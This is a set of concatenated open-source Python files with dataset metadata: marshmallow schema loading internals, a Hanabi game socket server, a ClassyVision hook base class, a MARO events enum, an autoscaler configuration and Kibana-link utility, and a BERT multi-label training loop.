return self.load(data, many=many, partial=partial, unknown=unknown)
def _run_validator(
self,
validator_func,
output,
*,
original_data,
error_store,
many,
partial,
pass_original,
index=None,
):
try:
if pass_original: # Pass original, raw data (before unmarshalling)
validator_func(output, original_data, partial=partial, many=many)
else:
validator_func(output, partial=partial, many=many)
except ValidationError as err:
error_store.store_error(err.messages, err.field_name, index=index)
def validate(
self,
data: typing.Mapping,
*,
many: bool = None,
partial: typing.Union[bool, types.StrSequenceOrSet] = None,
) -> typing.Dict[str, typing.List[str]]:
"""Validate `data` against the schema, returning a dictionary of
validation errors.
:param data: The data to validate.
:param many: Whether to validate `data` as a collection. If `None`, the
value for `self.many` is used.
:param partial: Whether to ignore missing fields and not require
any fields declared. Propagates down to ``Nested`` fields as well. If
its value is an iterable, only missing fields listed in that iterable
will be ignored. Use dot delimiters to specify nested fields.
:return: A dictionary of validation errors.
.. versionadded:: 1.1.0
"""
try:
self._do_load(data, many=many, partial=partial, postprocess=False)
except ValidationError as exc:
return typing.cast(typing.Dict[str, typing.List[str]], exc.messages)
return {}
##### Private Helpers #####
def _do_load(
self,
data: typing.Union[
typing.Mapping[str, typing.Any],
typing.Iterable[typing.Mapping[str, typing.Any]],
],
*,
many: bool = None,
partial: typing.Union[bool, types.StrSequenceOrSet] = None,
unknown: str = None,
postprocess: bool = True,
):
"""Deserialize `data`, returning the deserialized result.
This method is private API.
:param data: The data to deserialize.
:param many: Whether to deserialize `data` as a collection. If `None`, the
value for `self.many` is used.
:param partial: Whether to validate required fields. If its
value is an iterable, only fields listed in that iterable will be
ignored will be allowed missing. If `True`, all fields will be allowed missing.
If `None`, the value for `self.partial` is used.
:param unknown: Whether to exclude, include, or raise an error for unknown
fields in the data. Use `EXCLUDE`, `INCLUDE` or `RAISE`.
If `None`, the value for `self.unknown` is used.
:param postprocess: Whether to run post_load methods..
:return: Deserialized data
"""
error_store = ErrorStore()
errors = {} # type: typing.Dict[str, typing.List[str]]
many = self.many if many is None else bool(many)
unknown = unknown or self.unknown
if partial is None:
partial = self.partial
# Run preprocessors
if self._has_processors(PRE_LOAD):
try:
processed_data = self._invoke_load_processors(
PRE_LOAD, data, many=many, original_data=data, partial=partial
)
except ValidationError as err:
errors = err.normalized_messages()
result = (
None
) # type: typing.Optional[typing.Union[typing.List, typing.Dict]]
else:
processed_data = data
if not errors:
# Deserialize data
result = self._deserialize(
processed_data,
error_store=error_store,
many=many,
partial=partial,
unknown=unknown,
)
# Run field-level validation
self._invoke_field_validators(
error_store=error_store, data=result, many=many
)
# Run schema-level validation
if self._has_processors(VALIDATES_SCHEMA):
field_errors = bool(error_store.errors)
self._invoke_schema_validators(
error_store=error_store,
pass_many=True,
data=result,
original_data=data,
many=many,
partial=partial,
field_errors=field_errors,
)
self._invoke_schema_validators(
error_store=error_store,
pass_many=False,
data=result,
original_data=data,
many=many,
partial=partial,
field_errors=field_errors,
)
errors = error_store.errors
# Run post processors
if not errors and postprocess and self._has_processors(POST_LOAD):
try:
result = self._invoke_load_processors(
POST_LOAD,
result,
many=many,
original_data=data,
partial=partial,
)
except ValidationError as err:
errors = err.normalized_messages()
if errors:
exc = ValidationError(errors, data=data, valid_data=result)
self.handle_error(exc, data, many=many, partial=partial)
raise exc
return result
def _normalize_nested_options(self) -> None:
"""Apply then flatten nested schema options.
This method is private API.
"""
if self.only is not None:
# Apply the only option to nested fields.
self.__apply_nested_option("only", self.only, "intersection")
# Remove the child field names from the only option.
self.only = self.set_class([field.split(".", 1)[0] for field in self.only])
if self.exclude:
# Apply the exclude option to nested fields.
self.__apply_nested_option("exclude", self.exclude, "union")
# Remove the parent field names from the exclude option.
self.exclude = self.set_class(
[field for field in self.exclude if "." not in field]
)
def __apply_nested_option(self, option_name, field_names, set_operation) -> None:
"""Apply nested options to nested fields"""
# Split nested field names on the first dot.
nested_fields = [name.split(".", 1) for name in field_names if "." in name]
# Partition the nested field names by parent field.
nested_options = defaultdict(list) # type: defaultdict
for parent, nested_names in nested_fields:
nested_options[parent].append(nested_names)
# Apply the nested field options.
for key, options in iter(nested_options.items()):
new_options = self.set_class(options)
original_options = getattr(self.declared_fields[key], option_name, ())
if original_options:
if set_operation == "union":
new_options |= self.set_class(original_options)
if set_operation == "intersection":
new_options &= self.set_class(original_options)
setattr(self.declared_fields[key], option_name, new_options)
def _init_fields(self) -> None:
"""Update self.fields, self.load_fields, and self.dump_fields based on schema options.
This method is private API.
"""
if self.opts.fields:
available_field_names = self.set_class(self.opts.fields)
else:
available_field_names = self.set_class(self.declared_fields.keys())
if self.opts.additional:
available_field_names |= self.set_class(self.opts.additional)
invalid_fields = self.set_class()
if self.only is not None:
# Return only fields specified in only option
field_names = self.set_class(self.only)
invalid_fields |= field_names - available_field_names
else:
field_names = available_field_names
# If "exclude" option or param is specified, remove those fields.
if self.exclude:
# Note that this isn't available_field_names, since we want to
# apply "only" for the actual calculation.
field_names = field_names - self.exclude
invalid_fields |= self.exclude - available_field_names
if invalid_fields:
message = f"Invalid fields for {self}: {invalid_fields}."
raise ValueError(message)
fields_dict = self.dict_class()
for field_name in field_names:
field_obj = self.declared_fields.get(field_name, ma_fields.Inferred())
self._bind_field(field_name, field_obj)
fields_dict[field_name] = field_obj
load_fields, dump_fields = self.dict_class(), self.dict_class()
for field_name, field_obj in fields_dict.items():
if not field_obj.dump_only:
load_fields[field_name] = field_obj
if not field_obj.load_only:
dump_fields[field_name] = field_obj
dump_data_keys = [
field_obj.data_key if field_obj.data_key is not None else name
for name, field_obj in dump_fields.items()
]
if len(dump_data_keys) != len(set(dump_data_keys)):
data_keys_duplicates = {
x for x in dump_data_keys if dump_data_keys.count(x) > 1
}
raise ValueError(
"The data_key argument for one or more fields collides "
"with another field's name or data_key argument. "
"Check the following field names and "
"data_key arguments: {}".format(list(data_keys_duplicates))
)
load_attributes = [obj.attribute or name for name, obj in load_fields.items()]
if len(load_attributes) != len(set(load_attributes)):
attributes_duplicates = {
x for x in load_attributes if load_attributes.count(x) > 1
}
raise ValueError(
"The attribute argument for one or more fields collides "
"with another field's name or attribute argument. "
"Check the following field names and "
"attribute arguments: {}".format(list(attributes_duplicates))
)
self.fields = fields_dict
self.dump_fields = dump_fields
self.load_fields = load_fields
def on_bind_field(self, field_name: str, field_obj: ma_fields.Field) -> None:
"""Hook to modify a field when it is bound to the `Schema`.
No-op by default.
"""
return None
def _bind_field(self, field_name: str, field_obj: ma_fields.Field) -> None:
"""Bind field to the schema, setting any necessary attributes on the
field (e.g. parent and name).
Also set field load_only and dump_only values if field_name was
specified in ``class Meta``.
"""
if field_name in self.load_only:
field_obj.load_only = True
if field_name in self.dump_only:
field_obj.dump_only = True
try:
field_obj._bind_to_schema(field_name, self)
except TypeError as error:
# Field declared as a class, not an instance. Ignore type checking because
# we handle unsupported arg types, i.e. this is dead code from
# the type checker's perspective.
if isinstance(field_obj, type) and issubclass(field_obj, base.FieldABC):
msg = (
'Field for "{}" must be declared as a '
"Field instance, not a class. "
'Did you mean "fields.{}()"?'.format(field_name, field_obj.__name__)
)
raise TypeError(msg) from error
raise error
self.on_bind_field(field_name, field_obj)
@lru_cache(maxsize=8)
def _has_processors(self, tag) -> bool:
return bool(self._hooks[(tag, True)] or self._hooks[(tag, False)])
def _invoke_dump_processors(
self, tag: str, data, *, many: bool, original_data=None
):
# The pass_many post-dump processors may do things like add an envelope, so
# invoke those after invoking the non-pass_many processors which will expect
# to get a list of items.
data = self._invoke_processors(
tag, pass_many=False, data=data, many=many, original_data=original_data
)
data = self._invoke_processors(
tag, pass_many=True, data=data, many=many, original_data=original_data
)
return data
def _invoke_load_processors(
self,
tag: str,
data,
*,
many: bool,
original_data,
partial: typing.Union[bool, types.StrSequenceOrSet],
):
# This has to invert the order of the dump processors, so run the pass_many
# processors first.
data = self._invoke_processors(
tag,
pass_many=True,
data=data,
many=many,
original_data=original_data,
partial=partial,
)
data = self._invoke_processors(
tag,
pass_many=False,
data=data,
many=many,
original_data=original_data,
partial=partial,
)
return data
def _invoke_field_validators(self, *, error_store: ErrorStore, data, many: bool):
for attr_name in self._hooks[VALIDATES]:
validator = getattr(self, attr_name)
validator_kwargs = validator.__marshmallow_hook__[VALIDATES]
field_name = validator_kwargs["field_name"]
try:
field_obj = self.fields[field_name]
except KeyError as error:
if field_name in self.declared_fields:
continue
raise ValueError(f'"{field_name}" field does not exist.') from error
data_key = (
field_obj.data_key if field_obj.data_key is not None else field_name
)
if many:
for idx, item in enumerate(data):
try:
value = item[field_obj.attribute or field_name]
except KeyError:
pass
else:
validated_value = self._call_and_store(
getter_func=validator,
data=value,
field_name=data_key,
error_store=error_store,
index=(idx if self.opts.index_errors else None),
)
if validated_value is missing:
data[idx].pop(field_name, None)
else:
try:
value = data[field_obj.attribute or field_name]
except KeyError:
pass
else:
validated_value = self._call_and_store(
getter_func=validator,
data=value,
field_name=data_key,
error_store=error_store,
)
if validated_value is missing:
data.pop(field_name, None)
def _invoke_schema_validators(
self,
*,
error_store: ErrorStore,
pass_many: bool,
data,
original_data,
many: bool,
partial: typing.Union[bool, types.StrSequenceOrSet],
field_errors: bool = False,
):
for attr_name in self._hooks[(VALIDATES_SCHEMA, pass_many)]:
validator = getattr(self, attr_name)
validator_kwargs = validator.__marshmallow_hook__[
(VALIDATES_SCHEMA, pass_many)
]
if field_errors and validator_kwargs["skip_on_field_errors"]:
continue
pass_original = validator_kwargs.get("pass_original", False)
if many and not pass_many:
for idx, (item, orig) in enumerate(zip(data, original_data)):
self._run_validator(
validator,
item,
original_data=orig,
error_store=error_store,
many=many,
partial=partial,
index=idx,
pass_original=pass_original,
)
else:
self._run_validator(
validator,
data,
original_data=original_data,
error_store=error_store,
many=many,
pass_original=pass_original,
partial=partial,
)
def _invoke_processors(
self,
tag: str,
*,
pass_many: bool,
data,
many: bool,
original_data=None,
**kwargs,
):
key = (tag, pass_many)
for attr_name in self._hooks[key]:
# This will be a bound method.
processor = getattr(self, attr_name)
processor_kwargs = processor.__marshmallow_hook__[key]
pass_original = processor_kwargs.get("pass_original", False)
if many and not pass_many:
if pass_original:
data = [
processor(item, original, many=many, **kwargs)
for item, original in zip(data, original_data)
]
else:
data = [processor(item, many=many, **kwargs) for item in data]
else:
if pass_original:
data = processor(data, original_data, many=many, **kwargs)
else:
data = processor(data, many=many, **kwargs)
return data
BaseSchema = Schema # for backwards compatibility
| 40.154281 | 97 | 0.585725 |
f3a29468b38ab3fdbc7d0cf5ffd1c45612225fd5 | 7,070 | py | Python | server.py | simsax/hanabi-bot | 0d63e72066d1e4acee9801df91a6664d9ecb834b | [
"MIT"
] | null | null | null | server.py | simsax/hanabi-bot | 0d63e72066d1e4acee9801df91a6664d9ecb834b | [
"MIT"
] | null | null | null | server.py | simsax/hanabi-bot | 0d63e72066d1e4acee9801df91a6664d9ecb834b | [
"MIT"
] | null | null | null | import os
import GameData
import socket
from game import Game
from game import Player
import threading
from constants import *
import logging
import sys
mutex = threading.Lock()
# SERVER
playerConnections = {}
game = Game()
playersOk = []
statuses = [
"Lobby",
"Game"
]
status = statuses[0]
commandQueue = {}
numPlayers = 2
def manageConnection(conn: socket, addr):
global status
global game
with conn:
logging.info("Connected by: " + str(addr))
keepActive = True
playerName = ""
while keepActive:
print("SERVER WAITING")
data = conn.recv(DATASIZE)
mutex.acquire(True)
if not data:
del playerConnections[playerName]
logging.warning("Player disconnected: " + playerName)
game.removePlayer(playerName)
if len(playerConnections) == 0:
logging.info("Shutting down server")
os._exit(0)
keepActive = False
else:
print(f"SERVER PROCESSING {GameData.GameData.deserialize(data)}")
data = GameData.GameData.deserialize(data)
print(f"SERVER RECEIVED {type(data)} from {data.sender}")
if status == "Lobby":
if type(data) is GameData.ClientPlayerAddData:
playerName = data.sender
commandQueue[playerName] = []
if playerName in playerConnections.keys() or playerName == "" and playerName is None:
logging.warning("Duplicate player: " + playerName)
conn.send(GameData.ServerActionInvalid("Player with that name already registered.").serialize())
mutex.release()
return
playerConnections[playerName] = (conn, addr)
logging.info("Player connected: " + playerName)
game.addPlayer(playerName)
conn.send(GameData.ServerPlayerConnectionOk(
playerName).serialize())
elif type(data) is GameData.ClientPlayerStartRequest:
game.setPlayerReady(playerName)
logging.info("Player ready: " + playerName)
conn.send(GameData.ServerPlayerStartRequestAccepted(len(game.getPlayers()), game.getNumReadyPlayers()).serialize())
if len(game.getPlayers()) == game.getNumReadyPlayers() and len(game.getPlayers()) >= numPlayers:
listNames = []
for player in game.getPlayers():
listNames.append(player.name)
logging.info(
"Game start! Between: " + str(listNames))
for player in playerConnections:
playerConnections[player][0].send(
GameData.ServerStartGameData(listNames).serialize())
game.start()
# This ensures every player is ready to send requests
elif type(data) is GameData.ClientPlayerReadyData:
playersOk.append(1)
# If every player is ready to send requests, then the game can start
if len(playersOk) == len(game.getPlayers()):
status = "Game"
for player in commandQueue:
for cmd in commandQueue[player]:
singleData, multipleData = game.satisfyRequest(
cmd, player)
if singleData is not None:
playerConnections[player][0].send(
singleData.serialize())
if multipleData is not None:
for id in playerConnections:
playerConnections[id][0].send(
multipleData.serialize())
if game.isGameOver():
os._exit(0)
commandQueue.clear()
elif type(data) is not GameData.ClientPlayerAddData and type(
data) is not GameData.ClientPlayerStartRequest and type(
data) is not GameData.ClientPlayerReadyData:
commandQueue[playerName].append(data)
# In game
elif status == "Game":
singleData, multipleData = game.satisfyRequest(
data, playerName)
if singleData is not None:
conn.send(singleData.serialize())
if multipleData is not None:
for id in playerConnections:
playerConnections[id][0].send(
multipleData.serialize())
if game.isGameOver():
logging.info("Game over")
logging.info("Game score: " +
str(game.getScore()))
# os._exit(0)
players = game.getPlayers()
game = Game()
for player in players:
logging.info("Starting new game")
game.addPlayer(player.name)
game.start()
mutex.release()
def manageInput():
while True:
data = input()
if data == "exit":
logging.info("Closing the server...")
os._exit(0)
def manageNetwork():
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((HOST, PORT))
logging.info("Hanabi server started on " + HOST + ":" + str(PORT))
while True:
s.listen()
conn, addr = s.accept()
threading.Thread(target=manageConnection,
args=(conn, addr)).start()
def start_server(nplayers):
global numPlayers
numPlayers = nplayers
logging.basicConfig(filename="game.log", level=logging.INFO, format='%(asctime)s %(levelname)s: %(message)s',
datefmt="%m/%d/%Y %I:%M:%S %p")
logging.getLogger().addHandler(logging.StreamHandler(sys.stdout))
threading.Thread(target=manageNetwork).start()
manageInput()
if __name__ == '__main__':
print("Type 'exit' to end the program")
if len(sys.argv) > 1:
if int(sys.argv[1]) > 1:
numPlayers = int(sys.argv[1])
start_server(numPlayers) | 43.374233 | 139 | 0.487553 |
4cebf86fdf6e0a2ea053d2105947d957b7def4df | 3,518 | py | Python | classy_vision/hooks/classy_hook.py | jerryzh168/ClassyVision-1 | 6acfb00a77487a9015803fbaad805330081293a9 | [
"MIT"
] | 1 | 2020-04-13T03:50:26.000Z | 2020-04-13T03:50:26.000Z | classy_vision/hooks/classy_hook.py | pkassotis/ClassyVision | e8704ecaa59a15dbb2f4b0724e85d6e5cb2f704e | [
"MIT"
] | null | null | null | classy_vision/hooks/classy_hook.py | pkassotis/ClassyVision | e8704ecaa59a15dbb2f4b0724e85d6e5cb2f704e | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from abc import ABC, abstractmethod
from typing import Any, Dict
from classy_vision.generic.util import log_class_usage
class ClassyHookState:
"""Class to store state within instances of ClassyHook.
Any serializable data can be stored in the instance's attributes.
"""
def get_classy_state(self) -> Dict[str, Any]:
return self.__dict__
def set_classy_state(self, state_dict: Dict[str, Any]):
# We take a conservative approach and only update the dictionary instead of
# replacing it. This allows hooks to continue functioning in case the state
# is loaded from older implementations.
self.__dict__.update(state_dict)
class ClassyHook(ABC):
"""Base class for hooks.
Hooks allow to inject behavior at different places of the training loop, which
are listed below in the chronological order.
on_start -> on_phase_start ->
on_step -> on_phase_end -> on_end
Deriving classes should call ``super().__init__()`` and store any state in
``self.state``. Any state added to this property should be serializable.
E.g. -
.. code-block:: python
class MyHook(ClassyHook):
def __init__(self, a, b):
super().__init__()
self.state.a = [1,2,3]
self.state.b = "my_hook"
# the following line is not allowed
# self.state.my_lambda = lambda x: x^2
"""
def __init__(self):
log_class_usage("Hooks", self.__class__)
self.state = ClassyHookState()
@classmethod
def from_config(cls, config) -> "ClassyHook":
return cls(**config)
def _noop(self, *args, **kwargs) -> None:
"""Derived classes can set their hook functions to this.
This is useful if they want those hook functions to not do anything.
"""
pass
@classmethod
def name(cls) -> str:
"""Returns the name of the class."""
return cls.__name__
@abstractmethod
def on_start(self, task) -> None:
"""Called at the start of training."""
pass
@abstractmethod
def on_phase_start(self, task) -> None:
"""Called at the start of each phase."""
pass
@abstractmethod
def on_step(self, task) -> None:
"""Called each time after parameters have been updated by the optimizer."""
pass
@abstractmethod
def on_phase_end(self, task) -> None:
"""Called at the end of each phase (epoch)."""
pass
@abstractmethod
def on_end(self, task) -> None:
"""Called at the end of training."""
pass
def get_classy_state(self) -> Dict[str, Any]:
"""Get the state of the ClassyHook.
The returned state is used for checkpointing.
Returns:
A state dictionary containing the state of the hook.\
"""
return self.state.get_classy_state()
def set_classy_state(self, state_dict: Dict[str, Any]) -> None:
"""Set the state of the ClassyHook.
Args:
state_dict: The state dictionary. Must be the output of a call to
:func:`get_classy_state`.
This is used to load the state of the hook from a checkpoint.
"""
self.state.set_classy_state(state_dict)
| 28.836066 | 83 | 0.627629 |
bb3478a59ce99552162a39f1e455a7112108d3ca | 549 | py | Python | maro/simulator/scenarios/cim/events.py | yangboz/maro | 0973783e55ca07bf8e177910c9d47854117a4ea8 | [
"MIT"
] | 598 | 2020-09-23T00:50:22.000Z | 2022-03-31T08:12:54.000Z | maro/simulator/scenarios/cim/events.py | gx9702/maro | 38c796f0a7ed1e0f64c299d96c6e0df032401fa9 | [
"MIT"
] | 235 | 2020-09-22T10:20:48.000Z | 2022-03-31T02:10:03.000Z | maro/simulator/scenarios/cim/events.py | gx9702/maro | 38c796f0a7ed1e0f64c299d96c6e0df032401fa9 | [
"MIT"
] | 116 | 2020-09-22T09:19:04.000Z | 2022-02-12T05:04:07.000Z | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from enum import Enum
class Events(Enum):
"""Event type for CIM problem."""
# RELEASE_EMPTY = 10
RETURN_FULL = "return_full"
LOAD_FULL = "load_full"
DISCHARGE_FULL = "discharge_full"
# RELEASE_FULL = 14
RETURN_EMPTY = "return_empty"
ORDER = "order"
VESSEL_ARRIVAL = "vessel_arrival"
VESSEL_DEPARTURE = "vessel_departure"
PENDING_DECISION = "pending_decision"
LOAD_EMPTY = "load_empty"
DISCHARGE_EMPTY = "discharge_empty"
| 26.142857 | 41 | 0.699454 |
0cbf86d8ba6b99c6d8be0d41324e87c3d576e2ab | 4,267 | py | Python | autoscaler/ui/util.py | RajsimmanRavi/Elascale_secure | 3aaa919ae5818930594375961c456cc8f5375f06 | [
"MIT"
] | 1 | 2018-06-26T16:33:52.000Z | 2018-06-26T16:33:52.000Z | autoscaler/ui/util.py | RajsimmanRavi/Elascale_secure | 3aaa919ae5818930594375961c456cc8f5375f06 | [
"MIT"
] | null | null | null | autoscaler/ui/util.py | RajsimmanRavi/Elascale_secure | 3aaa919ae5818930594375961c456cc8f5375f06 | [
"MIT"
] | 2 | 2018-02-21T18:52:49.000Z | 2022-02-21T13:50:50.000Z | import configparser
import os
import json
import requests
import sys
import autoscaler.conf.engine_config as eng
"""
Function to read a config file and return that variable.
"""
def read_file(f_name):
config = configparser.ConfigParser()
config.read(f_name)
return config
"""
Function to insert modified values to the appropriate config file (micro or macro).
Returns nothing. If error occurs, the try/except on the called function will catch the error
The argument is the received data from client/browser end. The format is in json:
{"service_type": "xx", "service": "xx", "${config_param}": "xx" ...}
service_type: defines whether it's a micro-service or macro-service
service: define what service is getting modified (i.e. iot_app_cass, iot_edge_processor etc.)
The other keys are basically the config_params (eg. cpu_up_lim, max_replica etc.)
The corresponding values are the newly modified values that needs to be written to file.
"""
def write_file(data):
config = configparser.ConfigParser()
#Convert string to json
data = json.loads(data)
service_type = data["service_type"] # Tells us whether 'micro' or 'macro'
service = data["service"]
micro_file = eng.MICRO_CONFIG
macro_file = eng.MACRO_CONFIG
# Read appropriate ini file
if service_type == "micro":
config.read(micro_file)
else:
config.read(macro_file)
#delete service_type and service keys from dict
del data["service_type"]
del data["service"]
for key, value in data.iteritems():
# Set appropriate values
config.set(service,key,value)
#Write the changes to file
if service_type == "micro":
with open(micro_file, 'wb') as configfile:
config.write(configfile)
else:
with open(macro_file, 'wb') as configfile:
config.write(configfile)
"""
Function to insert dashboard ID inside the url link (used in the function down below)
1st argument: dash_title: This is needed because we use different urls for different dshboards
2nd argument: dash_id: The ID we need to insert into the url
3rd argument: IP address of the elasticsearch
"""
def insert_id_url(dash_title, dash_id, elastic_ip_addr):
# As per Byungchul, I need to look only the last 1 min for Host and Container statistics which has titles "HostStatics_1" and "ContainerStatistics_2". Therefore they have different links
if ("_1" in dash_title) or ("_2" in dash_title):
link = "https://"+elastic_ip_addr+":5601/app/kibana#/dashboard/"+dash_id+"?embed=true&_g=(refreshInterval%3A('%24%24hashKey'%3A'object%3A1659'%2Cdisplay%3A'5%20seconds'%2Cpause%3A!f%2Csection%3A1%2Cvalue%3A5000)%2Ctime%3A(from%3Anow-1m%2Cmode%3Arelative%2Cto%3Anow))"
else:
link = "https://"+elastic_ip_addr+":5601/app/kibana#/dashboard/"+dash_id+"?embed=true&_g=(refreshInterval%3A('%24%24hashKey'%3A'object%3A1659'%2Cdisplay%3A'5%20seconds'%2Cpause%3A!f%2Csection%3A1%2Cvalue%3A5000)%2Ctime%3A(from%3Anow-15m%2Cmode%3Aabsolute%2Cto%3Anow))"
sys.stdout.flush()
return link
"""
Function to fetch the Kibana dashboard links. We decided to split one major dashboard into multiple smaller ones.
1. Host Stats - focuses on VMs - Get last 1min stats
2. Container Stats - Get last 1min stats
3. All Graphs (Eg. CPU, mem etc.)
4. All tables
"""
def get_kibana_links(elastic_ip_addr, nginx_cert):
# hostname has to be 'elasticsearch' in order for SSL authentication
req = requests.get("https://elasticsearch:9200/.kibana/dashboard/_search", verify=nginx_cert)
output = req.json()
output_dict = {}
#get all the dashboard dictionaries
dash_dicts = output["hits"]["hits"]
#go through each dict and extract the dashboard IDs
for dash in dash_dicts:
#Our interested dashboards have titles with '_'. So filter only those ones
if "_" in dash["_source"]["title"]:
#get title of the dashboard
dash_title = dash["_source"]["title"]
#get id of the dashboard
dash_id = dash["_id"]
output_dict[dash_title] = insert_id_url(dash_title, dash_id, elastic_ip_addr)
sys.stdout.flush()
return output_dict
| 37.104348 | 276 | 0.700023 |
c4bb689e5daa7939ebb1ec813fb0fff4fe31a42b | 8,910 | py | Python | mltc/train/trainer.py | hscspring/Multi-Label-Text-Classification | f0ae98bfffea2bc13fd948a4053ac1a6e91597ad | [
"MIT"
] | 52 | 2019-12-02T12:10:14.000Z | 2022-03-27T06:45:46.000Z | mltc/train/trainer.py | hscspring/Multi-Label-Text-Classification | f0ae98bfffea2bc13fd948a4053ac1a6e91597ad | [
"MIT"
] | 4 | 2019-12-09T02:42:34.000Z | 2022-01-21T05:54:09.000Z | mltc/train/trainer.py | hscspring/Multi-Label-Text-Classification | f0ae98bfffea2bc13fd948a4053ac1a6e91597ad | [
"MIT"
] | 21 | 2019-12-03T02:32:17.000Z | 2022-03-10T09:22:00.000Z |
import torch
from callback.progressbar import ProgressBar
from utils.utils import (restore_checkpoint, model_device,
summary, seed_everything, AverageMeter)
from torch.nn.utils import clip_grad_norm_
class Trainer(object):
def __init__(self, n_gpu,
model,
epochs,
logger,
criterion,
optimizer,
lr_scheduler,
early_stopping,
epoch_metrics,
batch_metrics,
gradient_accumulation_steps,
grad_clip=0.0,
verbose=1,
fp16=None,
resume_path=None,
training_monitor=None,
model_checkpoint=None
):
self.start_epoch = 1
self.global_step = 0
self.n_gpu = n_gpu
self.model = model
self.epochs = epochs
self.logger = logger
self.fp16 = fp16
self.grad_clip = grad_clip
self.verbose = verbose
self.criterion = criterion
self.optimizer = optimizer
self.lr_scheduler = lr_scheduler
self.early_stopping = early_stopping
self.epoch_metrics = epoch_metrics
self.batch_metrics = batch_metrics
self.model_checkpoint = model_checkpoint
self.training_monitor = training_monitor
self.gradient_accumulation_steps = gradient_accumulation_steps
self.model, self.device = model_device(
n_gpu=self.n_gpu, model=self.model)
if self.fp16:
try:
from apex import amp
except ImportError:
raise ImportError(
"Please install apex from \
https://www.github.com/nvidia/apex to use fp16 training.")
if resume_path:
self.logger.info(f"\nLoading checkpoint: {resume_path}")
resume_dict = torch.load(resume_path / 'checkpoint_info.bin')
best = resume_dict['epoch']
self.start_epoch = resume_dict['epoch']
if self.model_checkpoint:
self.model_checkpoint.best = best
self.logger.info(f"\nCheckpoint '{resume_path}' \
and epoch {self.start_epoch} loaded")
def epoch_reset(self):
self.outputs = []
self.targets = []
self.result = {}
for metric in self.epoch_metrics:
metric.reset()
def batch_reset(self):
self.info = {}
for metric in self.batch_metrics:
metric.reset()
def save_info(self, epoch, best):
model_save = self.model.module if hasattr(
self.model, 'module') else self.model
state = {"model": model_save,
'epoch': epoch,
'best': best}
return state
def valid_epoch(self, data):
pbar = ProgressBar(n_total=len(data))
self.epoch_reset()
self.model.eval()
with torch.no_grad():
for step, batch in enumerate(data):
batch = tuple(t.to(self.device) for t in batch)
input_ids, input_mask, segment_ids, label_ids = batch
logits = self.model(input_ids, input_mask, segment_ids)
self.outputs.append(logits.cpu().detach())
self.targets.append(label_ids.cpu().detach())
pbar.batch_step(step=step, info={}, bar_type='Evaluating')
self.outputs = torch.cat(self.outputs, dim=0).cpu().detach()
self.targets = torch.cat(self.targets, dim=0).cpu().detach()
loss = self.criterion(target=self.targets, output=self.outputs)
self.result['valid_loss'] = loss.item()
print("------------- valid result --------------")
if self.epoch_metrics:
for metric in self.epoch_metrics:
metric(logits=self.outputs, target=self.targets)
value = metric.value()
if value:
self.result[f'valid_{metric.name()}'] = value
if 'cuda' in str(self.device):
torch.cuda.empty_cache()
return self.result
def train_epoch(self, data):
pbar = ProgressBar(n_total=len(data))
tr_loss = AverageMeter()
self.epoch_reset()
for step, batch in enumerate(data):
self.batch_reset()
self.model.train()
batch = tuple(t.to(self.device) for t in batch)
input_ids, input_mask, segment_ids, label_ids = batch
print("input_ids, input_mask, segment_ids, label_ids SIZE: \n")
print(input_ids.size(), input_mask.size(),
segment_ids.size(), label_ids.size())
logits = self.model(input_ids, input_mask, segment_ids)
print("logits and label ids size: ",
logits.size(), label_ids.size())
loss = self.criterion(output=logits, target=label_ids)
if len(self.n_gpu) >= 2:
loss = loss.mean()
if self.gradient_accumulation_steps > 1:
loss = loss / self.gradient_accumulation_steps
if self.fp16:
with amp.scale_loss(loss, self.optimizer) as scaled_loss:
scaled_loss.backward()
clip_grad_norm_(amp.master_params(
self.optimizer), self.grad_clip)
else:
loss.backward()
clip_grad_norm_(self.model.parameters(), self.grad_clip)
if (step + 1) % self.gradient_accumulation_steps == 0:
self.lr_scheduler.step()
self.optimizer.step()
self.optimizer.zero_grad()
self.global_step += 1
if self.batch_metrics:
for metric in self.batch_metrics:
metric(logits=logits, target=label_ids)
self.info[metric.name()] = metric.value()
self.info['loss'] = loss.item()
tr_loss.update(loss.item(), n=1)
if self.verbose >= 1:
pbar.batch_step(step=step, info=self.info, bar_type='Training')
self.outputs.append(logits.cpu().detach())
self.targets.append(label_ids.cpu().detach())
print("\n------------- train result --------------")
# epoch metric
self.outputs = torch.cat(self.outputs, dim=0).cpu().detach()
self.targets = torch.cat(self.targets, dim=0).cpu().detach()
self.result['loss'] = tr_loss.avg
if self.epoch_metrics:
for metric in self.epoch_metrics:
metric(logits=self.outputs, target=self.targets)
value = metric.value()
if value:
self.result[f'{metric.name()}'] = value
if "cuda" in str(self.device):
torch.cuda.empty_cache()
return self.result
def train(self, train_data, valid_data, seed):
seed_everything(seed)
print("model summary info: ")
for step, (input_ids, input_mask, segment_ids,
label_ids) in enumerate(train_data):
input_ids = input_ids.to(self.device)
input_mask = input_mask.to(self.device)
segment_ids = segment_ids.to(self.device)
summary(self.model, *(input_ids, input_mask,
segment_ids), show_input=True)
break
# ***************************************************************
for epoch in range(self.start_epoch, self.start_epoch+self.epochs):
self.logger.info(f"Epoch {epoch}/{self.epochs}")
train_log = self.train_epoch(train_data)
valid_log = self.valid_epoch(valid_data)
logs = dict(train_log, **valid_log)
show_info = f'\nEpoch: {epoch} - ' + "-".join(
[f' {key}: {value:.4f} ' for
key, value in logs.items()])
self.logger.info(show_info)
# save
if self.training_monitor:
self.training_monitor.epoch_step(logs)
# save model
if self.model_checkpoint:
state = self.save_info(epoch, best=logs['valid_loss'])
self.model_checkpoint.bert_epoch_step(
current=logs[self.model_checkpoint.monitor], state=state)
# early_stopping
if self.early_stopping:
self.early_stopping.epoch_step(
epoch=epoch, current=logs[self.early_stopping.monitor])
if self.early_stopping.stop_training:
break
| 42.227488 | 80 | 0.533109 |
3cbac418fb631ae29ab6bb01c2c82b47b0016d22 | 426 | py | Python | espnet2/asr/specaug/abs_specaug.py | texpomru13/espnet | 7ef005e832e2fb033f356c16f54e0f08762fb4b0 | [
"Apache-2.0"
] | 5,053 | 2017-12-13T06:21:41.000Z | 2022-03-31T13:38:29.000Z | espnet2/asr/specaug/abs_specaug.py | texpomru13/espnet | 7ef005e832e2fb033f356c16f54e0f08762fb4b0 | [
"Apache-2.0"
